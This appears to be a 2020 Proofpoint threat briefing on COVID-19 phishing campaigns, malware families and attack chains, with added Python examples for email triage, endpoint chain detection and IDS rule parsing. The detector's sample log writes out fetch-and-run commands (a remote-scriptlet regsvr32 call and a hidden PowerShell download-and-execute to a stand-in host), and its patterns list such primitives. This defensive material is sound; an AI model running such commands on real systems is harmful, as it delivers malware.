Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures 27 May 2020
© 2019 Proofpoint. All rights reserved
Global Campaigns By Campaign Family
Global COVID-Themed Campaigns By Campaign Family
Global vs COVID Brand Abuse Trends (charts: All Global Campaign Brand Abuse; All COVID-Themed Global Campaign Brand Abuse)
Actors and Lures
Actors: Silent Librarian, Modest, Veers
Lures: Covid-19 Map, Covid-19 Fake Bill, Covid WHO Lure
Key Changes to Secure Posture for Remote Work
• High risk home network
• Traditional VPN could allow lateral movement
• Going straight to cloud apps from home office
• Traditional visibility limited
• Possibly personal device with uncertain security posture
• Targeted by phishing and BEC (likely leveraging COVID-19 lures)
• Low level of awareness for secure remote working
• No longer on corporate network
• Higher risk for downloaders pulling down secondary payloads
Protecting Transitions to Remote Work: People-Centric Secure Remote Access
• Insider Threat Management for increased visibility into what remote workers do with sensitive data
• ZTNA for rapid, zero trust implementation of secure remote access to on-prem systems and data without any hardware
• Email protection for protection from threats, plus awareness training for secure remote work practices
• Isolation to provide secure web browsing and BYOD access to SaaS applications
• CASB for visibility, RBA, threat protection, and DLP across cloud apps
Covid-19 Threats
• Relentless focus on credential phish
• Legitimate filesharing abuse
  – Domains with most threats detected: office[.]com, docs[.]google[.]com, windows[.]net, sharepoint[.]com
• More complex multi-stage threats
  – Example chain: CVE-2017-8570 + OLE → Squiblydoo (regsvr32.exe) → Lemon Tree (PoSH)
• More BEC variants
• Sophisticated attacks on Office 365 and G Suite accounts
  – Malicious third-party apps
COVID-19 By the Numbers
• 75 Million: COVID-19 volume (malicious messages, April 18-22)
• 330+: Campaigns tracked
Campaign themes
Actors are motivated and integrating different themes spanning global to personal.
Theme matrix axes: Intrinsic / Mixed / Extrinsic (primary motivations); Local / Regional / Global; Tactical / Operational / Strategic; Widespread / Mixed / Focused (delivery); secondary motivation: BEC.
Example themes: survival kits, medical supplies, "cases near me" (personal); shipping, manufacturing; retail, banking; tax reduction; transnational (e.g. "anti-bacteria" credit card); markets, World Health Organization.
Example geographies: Netherlands; China, Italy, Netherlands, Germany, United States, Japan, Australia.
Tactics Leveraging Coronavirus: Malware Payloads
• Emotet
• AZORult Stealer
• AgentTesla Keylogger
• GuLoader / NanoCore RAT
• Microsoft Office Phish
• HawkEye Keylogger
• Betabot
• Ave Maria / GuLoader / Remcos
• Ave Maria / Remcos / LimeRAT
• LimeRAT
• Ostap / The Trick
Across the Threats
• Malicious attachment
• Malicious URL
• Credential phishing
• BEC and email fraud
• File names
• Domain names
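The four threat categories above, together with the list of abused legitimate filesharing domains from the Covid-19 Threats slide, translate directly into mail-gateway triage checks. The following is an added example written for this page (it is not Proofpoint code and does not reproduce any product logic): it parses a raw message, flags a Reply-To domain that differs from the From domain (a BEC indicator), pandemic lure keywords in the subject, attachment types seen in the campaigns in this deck (.iso, RTF/Office), and links hosted on the legitimate services that cannot simply be blocklisted and therefore need isolation or sandboxing. The keyword list, the `.example` domains, and both sample messages are constructed for the demonstration.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from urllib.parse import urlparse

# Legitimate services the deck lists as hosting the most detected threats.
# Links to them cannot be blocked by domain, so they are routed to isolation/sandboxing.
ABUSED_LEGIT_DOMAINS = ("office.com", "docs.google.com", "windows.net", "sharepoint.com")

# Attachment types from the campaigns in the deck (.iso for Remcos,
# RTF/Office for the exploit- and Squiblydoo-based campaigns).
RISKY_EXTENSIONS = (".iso", ".img", ".rtf", ".doc", ".docm", ".xls", ".xlsm")

# Pandemic lure vocabulary (assumed keyword list, not taken from the deck).
LURE_KEYWORDS = ("covid", "corona", "fmla", "relief", "stimulus")

URL_RE = re.compile(r"https?://[^\s<>\"')]+", re.I)


def _domain(addr):
    """Lower-cased domain of an email address, '' if there is none."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _under(host, base):
    """True if host is base or a subdomain of it (so 'evilwindows.net' does not match)."""
    return host == base or host.endswith("." + base)


def triage(raw):
    """Return findings and a verdict for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # BEC indicator: replies are steered to a domain other than the sender's.
    _, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    from_dom, reply_dom = _domain(from_addr), _domain(reply_addr)
    if reply_dom and reply_dom != from_dom:
        findings.append(f"BEC indicator: Reply-To domain {reply_dom} differs from From domain {from_dom}")

    subject = str(msg.get("Subject", "")).lower()
    hits = [k for k in LURE_KEYWORDS if k in subject]
    if hits:
        findings.append("pandemic lure keywords in subject: " + ", ".join(hits))

    # Attachment names are taken from the MIME parts, not from the subject or body.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_EXTENSIONS):
            findings.append(f"risky attachment type: {name}")

    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if any(_under(host, d) for d in ABUSED_LEGIT_DOMAINS):
            findings.append(f"link on abused legitimate service {host}: route to isolation")

    verdict = "hold" if len(findings) >= 2 else "deliver"
    return {"findings": findings, "verdict": verdict}


def sample_phish():
    """Constructed message modelled on the WHO-themed lure; all domains are invented."""
    m = EmailMessage()
    m["From"] = '"World Health Organization" <alerts@who-covid19-alerts.example>'
    m["Reply-To"] = "vessel-reports@mail-relay.example"
    m["To"] = "ops@shipping.example"
    m["Subject"] = "COVID-19 HIGH RISK VSL / URGENT"
    m.set_content("See the attached report and the copy at\nhttps://tenant.sharepoint.com/:b:/s/ops/report\n")
    m.add_attachment(b"not a real disc image", maintype="application",
                     subtype="octet-stream", filename="Report.iso")
    return m.as_string()


def sample_benign():
    """Constructed internal message with no indicators."""
    m = EmailMessage()
    m["From"] = "finance@shipping.example"
    m["Reply-To"] = "finance@shipping.example"
    m["To"] = "ops@shipping.example"
    m["Subject"] = "Q2 budget review"
    m.set_content("Slides are on the intranet:\nhttps://intranet.shipping.example/q2\n")
    return m.as_string()


if __name__ == "__main__":
    for raw in (sample_phish(), sample_benign()):
        print(triage(raw))
```

Each finding is independent, so a single hit (for example one SharePoint link in an otherwise clean internal mail) only deserves isolation of that link, while the "hold" verdict is reserved for messages that stack several indicators. The `_under` check matters: a bare `endswith("windows.net")` would also match attacker-registered lookalikes such as `evilwindows.net` and push them into the "legitimate service" path.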
Threat Focus: Examples from the Landscape
Remcos RAT – COVID-19
Threat Overview
• Summary: Campaign distributing Remcos RAT / downloader with 2 lures (one COVID-19, one harassment)
• Subject: Sexual harassment report / package notification
• Tactics and Tools: .iso image file
• Malware: Remcos RAT
• Volume: Widespread distribution
Family and Medical Leave Act
Threat Overview
• Summary: Campaign spoofing the US Department of Labor
• Lure: FMLA adjustments
• Technique: IcedID (modular malware)
• Volume: Broadly targeted
Agent Tesla port vessel
Threat Overview
• Summary: Message purporting to be from the World Health Organization, carrying the WHO seal
• Subject: "COVID-19 HIGH RISK VSL / URGENT"
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor CVE-2017-11882, CVE-2017-8570) or macros to download Agent Tesla
• Volumes: ~4,000 messages; 372 organizations; 44% Transportation; 15% Energy
The Truth of COVID-19
Threat Overview
• Summary: Campaign leveraging Word documents and the Squiblydoo technique to launch a PowerShell script
• Subject: The Truth of COVID-19 ????????????
• Tactics and Tools: Word (RTF) documents used Squiblydoo (regsvr32.exe) to launch a PowerShell script, followed by downloads of Mimikatz and the remote desktop utility FreeRDP
• Malware: Mimikatz via PowerShell script, then download of FreeRDP
• Targeting: 80 Proofpoint customers across 36 verticals
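The multi-stage chain on the Covid-19 Threats slide (Office exploit → Squiblydoo via regsvr32.exe → PowerShell) and the "Truth of COVID-19" campaign above are the same shape on the endpoint, and the Agent Tesla campaign's Equation Editor exploits add eqnedt32.exe as another Office-side parent. The following is an added example for this page, not Proofpoint detection content: it tags Sysmon-style process-creation events (Office parent spawning a living-off-the-land binary; regsvr32 loading scrobj.dll with a remote scriptlet; PowerShell with download or decode primitives) and then walks ParentProcessGuid links so that only the full Office → regsvr32 → PowerShell lineage raises a chain alert. The field names follow Sysmon event 1, the regexes are my own, and the five log lines are constructed (the hostnames, GUIDs and `cdn.example` URLs are invented).

```python
import json
import re

# Office parents, including the Equation Editor host abused by CVE-2017-11882.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
LOLBINS = {"regsvr32.exe", "mshta.exe", "rundll32.exe", "cmd.exe", "powershell.exe",
           "wscript.exe", "cscript.exe", "certutil.exe"}

# Squiblydoo: regsvr32 loading scrobj.dll with a scriptlet fetched over HTTP(S).
SCROBJ_RE = re.compile(r"scrobj\.dll", re.I)
REMOTE_SCT_RE = re.compile(r"/i:\s*\"?https?://", re.I)
# PowerShell download / decode primitives typical of a second stage (assumed list).
PS_STAGE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|-enc", re.I)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev):
    """Tags for one process-creation event (Sysmon event 1 style fields)."""
    tags = []
    image, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev.get("CommandLine", "")
    if parent in OFFICE and image in LOLBINS:
        tags.append("office_spawns_lolbin")
    if image == "regsvr32.exe" and SCROBJ_RE.search(cmd) and REMOTE_SCT_RE.search(cmd):
        tags.append("squiblydoo")
    if image == "powershell.exe" and PS_STAGE_RE.search(cmd):
        tags.append("powershell_stage")
    return tags


def detect_chains(lines):
    """Parse JSON lines, tag each event, then walk parent links from every staged
    PowerShell back to an Office ancestor through a Squiblydoo regsvr32.
    Returns (per-event alerts, correlated chains)."""
    events = [json.loads(l) for l in lines if l.strip()]
    by_guid = {e["ProcessGuid"]: e for e in events}
    tags = {e["ProcessGuid"]: classify(e) for e in events}
    alerts = [{"host": e["Computer"], "image": _base(e["Image"]), "tags": tags[e["ProcessGuid"]]}
              for e in events if tags[e["ProcessGuid"]]]

    chains = []
    for e in events:
        if "powershell_stage" not in tags[e["ProcessGuid"]]:
            continue
        lineage, cur = [], e
        while cur is not None and len(lineage) < 10:          # bounded walk up the tree
            lineage.append(cur)
            cur = by_guid.get(cur.get("ParentProcessGuid"))
        has_squib = any("squiblydoo" in tags[a["ProcessGuid"]] for a in lineage)
        has_office = any(_base(a["Image"]) in OFFICE for a in lineage)
        if has_squib and has_office:
            chains.append({"host": e["Computer"],
                           "chain": " -> ".join(_base(a["Image"]) for a in reversed(lineage))})
    return alerts, chains


def _ev(computer, guid, pguid, parent, image, cmd):
    return json.dumps({"Computer": computer, "ProcessGuid": guid, "ParentProcessGuid": pguid,
                       "ParentImage": parent, "Image": image, "CommandLine": cmd})


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
REGSVR = r"C:\Windows\System32\regsvr32.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample log: one full chain on WS01, two benign look-alikes on WS02.
SAMPLE_LOG = [
    _ev("WS01", "g1", "g0", r"C:\Windows\explorer.exe", WINWORD,
        r'"WINWORD.EXE" /n "C:\Users\a\Downloads\The Truth of COVID-19.rtf"'),
    _ev("WS01", "g2", "g1", WINWORD, REGSVR,
        "regsvr32.exe /s /n /u /i:https://cdn.example/t.sct scrobj.dll"),
    _ev("WS01", "g3", "g2", REGSVR, PWSH,
        "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://cdn.example/m.ps1')"),
    # benign: local COM registration by an installer, no remote scriptlet
    _ev("WS02", "h1", "h0", r"C:\Windows\System32\msiexec.exe", REGSVR,
        r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    # benign: admin script without download primitives
    _ev("WS02", "h2", "h0", r"C:\Windows\explorer.exe", PWSH,
        r"powershell -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    found_alerts, found_chains = detect_chains(SAMPLE_LOG)
    print(found_alerts)
    print(found_chains)
</```

Per-event tags are useful for hunting but noisy on their own (installers legitimately call regsvr32, admins run PowerShell); the lineage walk is what turns them into a high-confidence alert, because a benign regsvr32 never has both an Office ancestor and a remote scriptlet argument. The same walk would pick up an eqnedt32.exe parent from the Equation Editor exploit path because that binary is in the `OFFICE` set.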
Emerging Trends
• Spoofed offers of relief from financial institutions
• Primarily steals credit card details, direct deposit details, and other forms of financial data
• Most prevalent in the United States; also present in Europe, Australia, and Africa
Proofpoint and COVID-19: Summary, our position, updates, questions
PEOPLE-CENTRIC PROTECTION: Protect people from the threats that target them
DATA AND ACCESS CONTROLS: Protect the data people create and access from security and compliance risk
AWARENESS AND TRAINING: Enable users to protect themselves and your organization
Channels covered: Cloud Accounts; Internal Email; Personal Webmail; Endpoint Activity; Web and Unsanctioned App Access; Sanctioned Access; Identity Deception
Products: Advanced Email Security; Targeted Attack Protection (TAP); Threat Response Auto-Pull (TRAP); Internal Mail Defense; Cloud Account Defense; Email Isolation; Email DLP; Email Encryption; CASB DLP; Browser Isolation; Zero Trust Access; Email Fraud Defense; Insider Threat Management; Cloud App Governance and Data Protection; Information Protection
Response and Resources
Response
• Detection for commodity malware remains strong
• TAP campaigns being tracked as "COVID-19"
• Set of COVID-19 hunting and detection IDS signatures available open source in ET Open
  – http://rules.emergingthreatspro.com/open/
• Free Meta VPN solution through September 2020
Continuing Updates
• Proofpoint blog updates
  – https://www.proofpoint.com/us/blog
• @threatinsight
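The ET Open signatures referenced above ship in Suricata/Snort rule syntax, and the first thing a hunting team usually wants is to pull the COVID-themed subset out of the full ruleset and see which SIDs, protocols and content matches it carries. The following is an added example (my own parser, not an ET or Proofpoint tool): it parses the rule header and option list, honouring backslash escapes and quoted strings when splitting on `;`, and filters rules by a keyword in `msg`. The three rules in `SAMPLE_RULES` are constructed to exercise the parser and are not ET Open signatures.

```python
import re

HEADER_RE = re.compile(
    r"^(?P<action>alert|drop|pass|reject)\s+(?P<proto>\S+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)

# Constructed sample rules in Suricata syntax; NOT ET Open signatures.
SAMPLE_RULES = r'''
# constructed samples for the parser, not ET Open
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"EXAMPLE COVID-19 Themed Lure Executable Request"; flow:established,to_server; http.uri; content:"/covid-19-map.exe"; nocase; classtype:trojan-activity; sid:9000001; rev:1;)
alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"EXAMPLE Observed Malicious SSL Cert (Coronavirus Lure)"; tls.cert_subject; content:"CN=corona-virus-map"; sid:9000002; rev:2;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"EXAMPLE Unrelated Rule With Escaped Semicolon"; content:"/foo\;bar"; sid:9000003; rev:1;)
'''


def split_options(opts):
    """Split 'k:v; k2; ...' on ';' while honouring backslash escapes and quoted strings."""
    out, cur, quoted, esc = [], [], False, False
    for ch in opts:
        if esc:
            cur.append(ch)
            esc = False
            continue
        if ch == "\\":
            cur.append(ch)
            esc = True
            continue
        if ch == '"':
            quoted = not quoted
        if ch == ";" and not quoted:
            tok = "".join(cur).strip()
            if tok:
                out.append(tok)
            cur = []
        else:
            cur.append(ch)
    tok = "".join(cur).strip()
    if tok:
        out.append(tok)
    return out


def parse_rule(line):
    """Parse one rule line into a dict; returns None for blanks, comments and non-rules."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    m = HEADER_RE.match(line)
    if not m:
        return None
    rule = {k: m.group(k) for k in ("action", "proto", "src", "sport", "dir", "dst", "dport")}
    rule.update({"options": [], "msg": None, "sid": None, "rev": None, "content": []})
    for opt in split_options(m.group("opts")):
        key, _, val = opt.partition(":")      # sticky buffers like http.uri have no value
        key, val = key.strip(), val.strip()
        rule["options"].append((key, val))
        if key == "msg":
            rule["msg"] = val.strip('"')
        elif key == "sid":
            rule["sid"] = int(val)
        elif key == "rev":
            rule["rev"] = int(val)
        elif key == "content":
            rule["content"].append(val.strip('"'))
    return rule


def parse_rules(lines):
    """Parse an iterable of rule-file lines, dropping comments and unparsable lines."""
    return [r for r in map(parse_rule, lines) if r is not None]


def find_theme(rules, keyword):
    """Rules whose msg mentions keyword, case-insensitively."""
    return [r for r in rules if r["msg"] and keyword.lower() in r["msg"].lower()]


if __name__ == "__main__":
    parsed = parse_rules(SAMPLE_RULES.splitlines())
    for r in find_theme(parsed, "covid") + find_theme(parsed, "corona"):
        print(r["sid"], r["rev"], r["proto"], r["msg"], r["content"])
```

To run this against the real ruleset, download the file from the ET Open URL above and pass `open(path)` to `parse_rules`; searching `msg` for "COVID" and "Corona" is a reasonable first cut, but the `content` matches are what tell you whether a signature keys on a lure file name, a domain or a certificate subject, which in turn decides whether it fires on plain HTTP only or also on TLS metadata.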
Other Resources (All Free)
• Proofpoint Meta available to all Proofpoint customers at no charge for zero trust network access
• Security Awareness Training attack spotlight: Covid-19 lures
• Remote worker-tailored training modules
• Partner offer: MFA and SSO from Okta: https://www.okta.com/okta-for-emergency-remote-work/